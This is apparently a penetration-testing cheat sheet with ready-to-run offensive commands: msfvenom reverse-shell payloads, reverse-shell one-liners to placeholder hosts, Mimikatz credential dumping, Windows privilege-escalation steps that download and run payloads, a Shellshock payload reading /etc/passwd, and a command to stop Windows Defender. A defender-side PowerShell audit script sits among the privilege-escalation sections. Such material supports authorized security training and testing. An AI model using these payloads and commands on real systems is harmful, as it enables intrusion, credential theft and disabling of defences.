ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGIs.txt -u <URL>/cgi-bin/FUZZ -t 50
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/cgi-bin/FUZZ -e .sh,.pl,.cgi -t 100

If a script is found try SHELLSHOCK.

Command and control framework


# Download
git clone https://github.com/mhaskar/Octopus/tree/v1.2
# Install requirements
pip install -r requirements.txt

# Usage
./octopus.py

# Listener (example)
listen_http <BIND_IP> <BIND_PORT> <HOSTNAME> <INTERVAL_IN_SECONDS> <URL> <LISTENER_NAME>
listen_http 0.0.0.0 80 192.168.1.87 5 test.php listener_1

# Agent (example)
generate_powershell <LISTENER_NAME>
generate_powershell listener_1

Compiling exploits
For linux
# 64 bits
gcc -o exploit exploit.c

# 32 bits
gcc -m32 -o exploit exploit.c

For windows
To compile Win32 bit executables, execute i686-w64-mingw32-gcc -o <FILE.exe> <FILE.c>
To compile Win64 bit executables, execute x86_64-w64-mingw32-gcc -o <FILE.exe> <FILE.c>
To compile a .cpp source file, execute i586-mingw32msvc-g++ -o <FILE>.exe <FILE>.cpp
To compile python scripts, pyinstaller --onefile <SCRIPT.py>

# Compile windows .exe on Linux


i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Cross compile
gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c

DICTIONARY GENERATION
cewl -m <WORDS_SIZE> --with-numbers -w dictiFromWebsite <URL> -d <DEPTH>
crunch 5 5 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -t Test@ -o passwords.txt

FILE TRANSFER
Linux
# PYTHON
python -m SimpleHTTPServer <PORT>
python2.7 -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"

# FTP
sudo python3 -m pyftpdlib -p 21 -w

# SMB
sudo smbserver.py -smb2support liodeus .

# WGET
wget <URL> -O <OUT_FILE>

# CURL
curl <URL> -o <OUT_FILE>
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>

# SCP
scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_FILE>

Windows
# FTP
echo open <IP> 21> ftp.txt
echo USER anonymous>> ftp.txt
echo password>> ftp.txt
echo binary>> ftp.txt
echo GET <FILE>>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

# SMB
copy \\<IP>\<PATH>\<FILE> # Linux -> Windows
copy <FILE> \\<IP>\<PATH>\ # Windows -> Linux

# Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('<URL>', '<DESTINATION_FILE>')
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('<URL>')
powershell "wget <URL>"

# Python
python.exe -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"

# CertUtil
certutil.exe -urlcache -split -f "<URL>"

# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# CURL
curl <URL> -o <OUT_FILE>

GIT
Download .git
mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>

Extract .git content


mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>

HASHES
Windows
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System

samdump2 System SAM > hashes

Linux
unshadow passwd shadow > hashes

MIMIKATZ
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export

kerberos::list /export

vault::cred
vault::list

lsadump::sam
lsadump::secrets
lsadump::cache

MISCELLANEOUS
Get a Windows path without spaces
# path.cmd
@echo off
echo %~s1

path.cmd "C:\Program Files (x86)\Common Files\test.txt"


C:\PROGRA~2\COMMON~1\test.txt -> Valid path without spaces

MSFVENOM PAYLOAD
Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

PHP
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Then we need to add the <?php tag on the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener
Metasploit

use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z

Netcat

nc -lvp <PORT>

PASSWORD CRACKING
Online
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes
https://hashes.com/en/decrypt/hash

Hashcat
Linux password
hashcat -m 1800 -a 0 hash.txt rockyou.txt
hashcat -m 1800 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Windows password

hashcat -m 1000 -a 0 hash.txt rockyou.txt


hashcat -m 1000 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Others
hashcat --example-hashes | grep -i '<BEGINNING_OF_HASH>'

Rules
https://github.com/NotSoSecure/password_cracking_rules

John
john --wordlist=<PASSWORDS_LIST> hash.txt

PIVOTING
Sshuttle
sshuttle <USER>@<IP> <IP_OF_THE_INTERFACE>/CIDR

Proxychains
ssh -f -N -D 9050 <USER>@<IP>
proxychains <COMMAND>

Interesting link
https://artkond.com/2017/03/23/pivoting-guide/

PRIVILEGE ESCALATION
Linux
Enumeration scripts

bash LinEnum.sh
bash lse.sh -l 1
bash linpeas.sh
python linuxprivchecker.py
./unix-privesc-check standard
Vulnerability scan

perl les2.pl
bash les.sh

Suid checker

python suid3num.py

https://gtfobins.github.io/

Methodology to follow
https://guif.re/linuxeop
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- sudo -l
- Kernel exploits
- OS exploits
- Password reuse (mysql, .bash_history, 000-default.conf...)
- Known binaries with suid flag and interactive (nmap)
- Custom binaries with suid flag either using other binaries or with command execution
- Writable files owned by root that get executed (cronjobs)
- MySQL as root
- Vulnerable services (chkrootkit, logrotate)
- Writable /etc/passwd
- Readable .bash_history
- SSH private key
- Listening ports on localhost
- /etc/fstab
- /etc/exports
- /var/mail
- Process as other user (root) executing something you have permissions to modify
- SSH public key + predictable PRNG
- apt update hooking (PreInvoke)
Windows
Enumeration scripts
General scans

winPEAS.exe
windows-privesc-check2.exe
Seatbelt.exe -group=all
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
Powerless.bat
winPEAS.bat

Search for CVE

systeminfo > systeminfo.txt


python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx --systeminfo systeminfo.txt

systeminfo > systeminfo.txt


wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt

powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"

Post exploitation

lazagne.exe all
SharpWeb.exe
mimikatz.exe

JuicyPotato (SeImpersonate or SeAssignPrimaryToken)

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t *
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t * -c <CLSID>

# CLSID
https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

Methodology to follow

https://guif.re/windowseop
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Autorun
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking for modifiable registry autoruns and configs...

Key : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program
Path : "C:\Program Files\Autorun Program\program.exe"
ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files\Autorun Program\program.exe; IdentityReference=Everyone}

or

winPEAS.exe

[+] Autorun Applications(T1010)
Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
cd C:\Program Files\Autorun Program\
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')

To execute it with elevated privileges we need to wait for someone in the Administrators group to log in.

AlwaysInstallElevated
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking for AlwaysInstallElevated registry key...

AbuseFunction : Write-UserAddMSI

or

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

If both values are equal to 1 then it's vulnerable.

or

winPEAS.exe

[+] Checking AlwaysInstallElevated(T1012)
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > program.msi
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.msi', 'C:\Temp\program.msi')
msiexec /quiet /qn /i C:\Temp\program.msi

Executable Files
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking service executable and argument permissions...

ServiceName : filepermsvc
Path : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'filepermsvc'
CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

filepermsvc(Apache Software Foundation - File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
File Permissions: Everyone [AllAccess]

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', 'C:\Temp\program.exe')
copy /y c:\Temp\program.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc

Startup applications
Detection

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

C:\>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
Everyone:(I)(OI)(CI)(RX)

If the user you're connected as has full access "(F)" to the directory (here BUILTIN\Users does), then it's vulnerable.

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')

To execute it with elevated privileges we need to wait for someone in the Administrators group to log in.

Weak service permission
Detection

# Find all services authenticated users have modify access onto
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

If SERVICE_ALL_ACCESS is listed, then it's vulnerable.

# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

or

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking service permissions...

ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles

[+] Modifiable Services(T1007)

LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles

Exploitation

# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
sc start <SERVICENAME>
# or
net start <SERVICENAME>

Unquoted service paths
Detection

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

[*] Checking for unquoted service paths...

ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True

ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True

or

winPEAS.exe

[+] Interesting Services -non Microsoft-(T1007)

unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
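As an added defender-side example (not from the original cheatsheet), the PowerShell audit below reports the same misconfigurations that the PowerUp and winPEAS output in the Autorun, AlwaysInstallElevated, Executable Files, Startup applications and Unquoted service paths sections flags, each with its remediation; the function names are my own, and `<args>` in the suggested `sc.exe` fix is a placeholder for the service's original arguments.

```powershell
# Added audit script, not from the original cheatsheet. Run in an elevated
# PowerShell on the host being audited; each finding carries its fix.
$WeakIds    = 'Everyone|BUILTIN\\Users|Authenticated Users'   # low-privilege principals
$WeakRights = 'Write|Modify|FullControl'                       # write-type rights

function Get-ImagePath([string]$CommandLine) {
    # First quoted token, otherwise everything up to and including the first .exe
    if ($CommandLine.StartsWith('"')) { return $CommandLine.Split('"')[1] }
    return ($CommandLine -split '\.exe')[0] + '.exe'
}

function Test-WeakAcl([string]$Path) {
    # True when a low-privilege principal is explicitly allowed write-type access
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $hits = (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -match $WeakIds -and
        $_.FileSystemRights.ToString() -match $WeakRights }
    return [bool]$hits
}

function Get-PrivEscMisconfig {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Check, $Item, $Fix) {
        $findings.Add([pscustomobject]@{ Check = $Check; Item = $Item; Fix = $Fix })
    }
    # 1. AlwaysInstallElevated only applies when BOTH hives are set to 1
    $set = foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
        [int]((Get-ItemProperty $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated -eq 1)
    }
    if ($set -notcontains 0) { Add-Finding 'AlwaysInstallElevated' 'HKLM + HKCU' 'Set the policy to 0 (Disabled) in both hives' }
    # 2. Services: unquoted path containing spaces, and binary writable by low-privilege users
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object PathName) {
        $exe = Get-ImagePath $svc.PathName
        if (-not $svc.PathName.StartsWith('"') -and $exe -match ' ' -and $exe -notmatch '^[A-Za-z]:\\Windows\\') {
            # <args> is a placeholder for the service's original arguments, if any
            Add-Finding 'UnquotedServicePath' $svc.Name ('sc.exe config ' + $svc.Name + ' binPath= "\"' + $exe + '\" <args>"')
        }
        if (Test-WeakAcl $exe) { Add-Finding 'WritableServiceBinary' "$($svc.Name): $exe" 'Remove write access for Users/Everyone with icacls' }
    }
    # 3. All-users Startup folder (the icacls check from the cheatsheet)
    $startup = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    if (Test-WeakAcl $startup) { Add-Finding 'WritableStartupFolder' $startup 'Restore the default ACL: Users get read/execute only' }
    # 4. Targets of machine-wide Run autoruns
    $run = Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -ErrorAction SilentlyContinue
    if ($run) { foreach ($name in $run.GetValueNames()) {
        $exe = Get-ImagePath ([string]$run.GetValue($name))
        if (Test-WeakAcl $exe) { Add-Finding 'WritableAutorunTarget' "${name}: $exe" 'Remove write access for Users/Everyone with icacls' }
    } }
    return $findings
}

Get-PrivEscMisconfig | Format-Table -AutoSize -Wrap
```

An empty table means none of the five conditions is present; the ACL test is deliberately coarse (any Write, Modify or FullControl grant to Everyone, Users or Authenticated Users), so review each hit before changing permissions.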

Exploitation

# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe', '.\Common.exe')
sc start unquotedsvc

Hot potato
Exploitation

# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>

# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1', '.\Tater.ps1')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"

CVE

# Already compiled exploits
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/abatchy17/WindowsExploits

Windows XP

CVE            Description
CVE-2002-1214  ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS
CVE-2003-0352  ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service
CVE-2003-0533  MS04-011 - ms04_011_lsass - exploits a stack buffer overflow in the LSASS service
CVE-2003-0719  ms04_011_pct - exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack - Private communication target overflow
CVE-2003-0812  ms03_049_netapi - exploits a stack buffer overflow in the NetApi32
CVE-2003-0818  ms04_007_killbill - vulnerability in the bit string decoding code in the Microsoft ASN.1 library
CVE-2003-0822  ms03_051_fp30reg_chunked - exploit for the chunked encoding buffer overflow described in MS03-051
CVE-2004-0206  ms04_031_netdde - exploits a stack buffer overflow in the NetDDE service
CVE-2010-3138  EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse
CVE-2010-3147  EXPLOIT-DB 14745 - Untrusted search path vulnerability in wab.exe - allows local users to gain privileges via a Trojan horse
CVE-2010-3970  ms11_006_createsizeddibsection - exploits a stack-based buffer overflow in thumbnails within .MIC files - code execution
CVE-2011-1345  Internet Explorer does not properly handle objects in memory - allows remote execution of code via object
CVE-2011-5046  EXPLOIT-DB 18275 - GDI in Windows does not properly validate user-mode input - allows remote code execution
CVE-2012-4349  Unquoted Windows search path - Windows provides the capability of including spaces in path names - can be root

Windows 7

CVE            Description
CVE-2010-0232  ms10_015_kitrap0d - create a new session with SYSTEM privileges via the KiTrap0D exploit
CVE-2010-2568  ms10_046_shortcut_icon_dllloader - exploits a vulnerability in the handling of Windows Shortcut files (.LNK) - run a payload
CVE-2010-2744  EXPLOIT-DB 15894 - kernel-mode drivers in Windows do not properly manage a window class - allows privilege escalation
CVE-2010-3227  EXPLOIT-DB - Stack-based buffer overflow in the UpdateFrameTitleForDocument method - arbitrary code execution
CVE-2014-4113  ms14_058_track_popup_menu - exploits a NULL Pointer Dereference in win32k.sys - arbitrary code execution
CVE-2014-4114  ms14_060_sandworm - exploits a vulnerability found in Windows Object Linking and Embedding - arbitrary code execution
CVE-2015-0016  ms15_004_tswbproxy - abuses a process creation policy in Internet Explorer's sandbox - code execution
CVE-2018-8494  remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input

Windows 8

CVE            Description
CVE-2013-0008  ms13_005_hwnd_broadcast - attacker can broadcast commands from a lower Integrity Level process to a higher one - privilege escalation
CVE-2013-1300  ms13_053_schlamperei - kernel pool overflow in Win32k - local privilege escalation
CVE-2013-3660  ppr_flatten_rec - exploits EPATHOBJ::pprFlattenRec due to the usage of uninitialized data - allows memory corruption
CVE-2013-3918  ms13_090_cardspacesigninhelper - exploits CardSpaceClaimCollection class from the icardie.dll ActiveX control - code execution
CVE-2013-7331  ms14_052_xmldom - uses Microsoft XMLDOM object to enumerate a remote machine's filenames
CVE-2014-6324  ms14_068_kerberos_checksum - exploits the Microsoft Kerberos implementation - privilege escalation
CVE-2014-6332  ms14_064_ole_code_execution - exploits the Windows OLE Automation array vulnerability
CVE-2014-6352  ms14_064_packager_python - exploits Windows Object Linking and Embedding (OLE) - arbitrary code execution
CVE-2015-0002  ntapphelpcachecontrol - NtApphelpCacheControl Improper Authorization Check - privilege escalation

Windows 10

CVE            Description
CVE-2015-0057  exploits GUI component of Windows, namely the scrollbar element - allows complete control of a Windows machine
CVE-2015-1769  MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
CVE-2015-2426  ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
CVE-2015-2479  MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
CVE-2015-2513  MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
CVE-2015-2423  MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information Disclosure
CVE-2015-2431  MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
CVE-2015-2441  MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution

Windows Server 2003

CVE            Description
CVE-2008-4250  ms08_067_netapi - exploits a parsing flaw in the path canonicalization code of NetAPI32.dll - bypassing NX
CVE-2017-8487  allows an attacker to execute code when a victim opens a specially crafted file - remote code execution

PROOFS
Linux
echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "

Windows
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

REVERSE SHELL
Amazing tool for shell generation
# Download
git clone https://github.com/ShutdownRepo/shellerator
cd shellerator

# Install requirements
pip3 install --user -r requirements.txt

# Executable from anywhere
sudo cp shellerator.py /bin/shellerator

Bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Perl
perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f

More reverse shells

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Interactive shell
# Python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# From inside a Python interpreter
echo os.system('/bin/bash')

# Sh
/bin/bash -i

# Perl
perl -e 'exec "/bin/bash"'

# From inside a Ruby interpreter (irb)
exec "/bin/bash"

# From inside a Lua interpreter
os.execute('/bin/bash')

Adjust Interactive shell

stty size            # In a local terminal: find your terminal size -> 50 235
Ctrl-Z               # Background the remote shell
stty raw -echo       # Disable local echo
fg                   # Bring the remote shell back
export SHELL=bash
export TERM=xterm     # or: export TERM=xterm-256color
stty rows 50 columns 235

SHELLSHOCK
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" <URL>/cgi-bin/<SCRIPT>

USEFUL LINUX COMMANDS

Find a file
locate <FILE>
find / -name "<FILE>"

Active connections
netstat -lntp

List all SUID files
find / -perm -4000 2>/dev/null

Determine the current version of Linux
cat /etc/issue

Determine more information about the environment
uname -a

List running processes
ps -faux

List the allowed (and forbidden) commands for the invoking user
sudo -l

USEFUL WINDOWS COMMANDS

net config Workstation
systeminfo
net users

ipconfig /all
netstat -ano

schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s pass == cred == vnc == .config
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Disable Windows Defender
sc stop WinDefend

# Bypass restriction
powershell -nop -ep bypass

# List hidden files
dir /a

# Find a file
dir /b/s "<FILE>"

ZIP
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' file.zip

zip2john file.zip > zip.john
john --wordlist=<PASSWORDS_LIST> zip.john

© 2023 Liodeus.
